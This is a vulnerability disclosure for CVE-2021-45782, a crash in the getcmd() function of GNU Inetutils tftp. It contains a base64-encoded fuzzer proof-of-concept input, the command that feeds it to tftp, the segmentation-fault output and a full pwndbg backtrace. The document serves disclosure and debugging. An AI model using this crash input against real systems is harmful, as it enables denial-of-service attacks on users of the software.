Headline
CVE-2021-45782: Untrusted Pointer Dereference in getcmd() at inetutils/src/tftp.c:878
An untrusted pointer dereference in getcmd() at inetutils/src/tftp.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.
# Untrusted Pointer Dereference in getcmd() at inetutils/src/tftp.c:878
## Description
An Untrusted Pointer Dereference was discovered in getcmd() at inetutils/src/tftp.c:878. The vulnerability causes a segmentation fault and application crash.
**version**
```
./tftp --version
tftp (GNU inetutils) 2.2.16-cf091
Copyright © 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later https://gnu.org/licenses/gpl.html\.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by many authors.
```
**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
## Proof of Concept
**poc**
```
base64 poc
PyA/IGIg/zc/IGIgEMoiICIgEAsgYiDKysogIiAQNyIiIyIgIiAQCyA/IGIgNwQgIP83IyIgIiAQ
CyA6uwQvHiIUYiDKysrKPyA/IGIgEMoiICIgEDciIiMiICIgEAsgPyBiIDcEICD/NyMiICIgEAsg
OrsELx4iFGIgysrKyj8gPyBiIBDKIiAiIBALIGIgysrKICIpEDciICIgEAsgYiDKysogIiAQNyIi
IABAMAsg
```
**command:**
```
./tftp < ./poc
```
**Result**
```
./tftp < poc
print help information
set mode to octet
?Invalid help command �7?
set mode to octet
?Invalid help command �"
?Invalid help command "
?Invalid help command
set mode to octet
?Invalid help command ���
?Invalid help command "
?Invalid help command 7""#"
?Invalid help command "
?Invalid help command
print help information
set mode to octet
?Invalid help command 7
?Invalid help command �7#"
?Invalid help command "
?Invalid help command
?Invalid help command :� / " b
?Invalid help command ����?
print help information
set mode to octet
?Invalid help command �"
?Invalid help command "
?Invalid help command 7""#"
?Invalid help command "
?Invalid help command
print help information
set mode to octet
?Invalid help command 7
?Invalid help command �7#"
?Invalid help command "
?Invalid help command
?Invalid help command :� / " b
?Invalid help command ����?
print help information
set mode to octet
?Invalid help command �"
?Invalid help command "
?Invalid help command
set mode to octet
?Invalid help command ���
?Invalid help command ") 7"
?Invalid help command "
?Invalid help command
set mode to octet
?Invalid help command ���
?Invalid help command "
[1] 1736392 segmentation fault ./tftp < poc
```
**gdb**
```
Program received signal SIGSEGV, Segmentation fault.
0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878
878 for (c = cmdtab; (p = c->name) != NULL; c++)
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
RAX 0x18
RBX 0x555555567b50 (margc) ◂— 0x555500000033 /* ‘3’ */
RCX 0x0
RDX 0x0
RDI 0x555500000033
RSI 0x55555556258c ◂— 0x7463656e6e6f63 /* ‘connect’ */
R8 0x0
R9 0x18
R10 0x55555556243b ◂— 0x203a70746674000a /* ‘\n’ */
R11 0x246
R12 0x555500000033
R13 0x555555562423 ◂— ‘?Invalid help command %s\n’
R14 0x0
R15 0x0
RBP 0x555555567b50 (margc) ◂— 0x555500000033 /* ‘3’ */
RSP 0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp rax, -1
RIP 0x555555558bc4 (getcmd+20) ◂— movzx r9d, byte ptr [rdi]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
► 0x555555558bc4 <getcmd+20> movzx r9d, byte ptr [rdi]
0x555555558bc8 <getcmd+24> push rbx
0x555555558bc9 <getcmd+25> xor r11d, r11d
0x555555558bcc <getcmd+28> xor r10d, r10d
0x555555558bcf <getcmd+31> xor ebx, ebx
0x555555558bd1 <getcmd+33> lea r8, [rip + 0xe7c8] <0x5555555673a0>
0x555555558bd8 <getcmd+40> lea rcx, [rsi + 1]
0x555555558bdc <getcmd+44> mov rdx, rdi
0x555555558bdf <getcmd+47> mov eax, r9d
0x555555558be2 <getcmd+50> cmp byte ptr [rsi], r9b
0x555555558be5 <getcmd+53> je getcmd+80 <getcmd+80>
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /home/aidai/fuzzing/inetutils/inetutils/src/tftp.c
873 register int nmatches, longest;
874
875 longest = 0;
876 nmatches = 0;
877 found = 0;
► 878 for (c = cmdtab; (p = c->name) != NULL; c++)
879 {
880 for (q = name; *q == *p++; q++)
881 if (*q == 0) /* exact match? */
882 return ©;
883
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp rax, -1
01:0008│ 0x7fffffffe140 —▸ 0x55555556b710 ◂— 0x0
02:0010│ 0x7fffffffe148 —▸ 0x5555555610f0 (__libc_csu_init) ◂— endbr64
03:0018│ 0x7fffffffe150 ◂— 0x33 /* ‘3’ */
04:0020│ 0x7fffffffe158 —▸ 0x5555555679c0 (margv) —▸ 0x555555567b80 (line) ◂— 0x37ff0062003f003f /* ‘?’ */
05:0028│ 0x7fffffffe160 —▸ 0x7fffffffe270 ◂— 0x1
06:0030│ 0x7fffffffe168 —▸ 0x555555557b83 (main+387) ◂— jmp 0x555555557b29
07:0038│ 0x7fffffffe170 —▸ 0x7fffffffe270 ◂— 0x1
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
► f 0 0x555555558bc4 getcmd+20
f 1 0x555555558cce help+78
f 2 0x555555557b83 main+387
f 3 0x555555557b83 main+387
f 4 0x7ffff7de70b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878
#1 0x0000555555558cce in help (argc=<optimized out>, argv=0x555555567b50 <margc>) at tftp.c:955
#2 0x0000555555557b83 in command () at tftp.c:864
#3 main (argc=argc@entry=1, argv=argv@entry=0x7fffffffe278) at tftp.c:298
#4 0x00007ffff7de70b3 in __libc_start_main (main=0x555555557a00 <main>, argc=1, argv=0x7fffffffe278, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe268) at …/csu/libc-start.c:308
#5 0x0000555555557c0e in _start () at /usr/include/x86_64-linux-gnu/bits/stdio2.h:107
```